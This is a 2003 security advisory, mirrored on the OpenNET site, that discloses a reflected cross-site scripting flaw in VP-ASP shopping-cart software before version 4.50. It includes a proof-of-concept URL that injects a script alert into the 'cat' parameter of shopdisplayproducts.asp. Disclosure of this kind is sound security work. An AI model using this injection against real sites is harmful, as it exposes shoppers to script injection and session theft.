The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Cross Site Scripting in VP-ASP


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Fri, 5 Dec 2003 04:19:28 -0800 (PST)
From: Xnuxer Research Laboratory <[email protected]>
To: [email protected]
Subject: Cross Site Scripting in VP-ASP

   Advisory Name: Cross Site Scripting in VP-ASP
    Release Date: December 05st, 2003
     Application: VP-ASP
Version Affected: < 4.50
        Platform: ASP
        Severity: Low
        Discover: Xnuxer Research Lab. ([email protected], [email protected])
      Vendor URL: http://www.vp-asp.com
       Reference: http://infosekuriti.com

Proof Of Concept:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=&#091;XSS Code]

Exploit Example:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=<;script>alert('test')</script>



_____________________________________________________________
Linux.Net -->Open Source to everyone
Powered by Linare Corporation
http://www.linare.com/

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру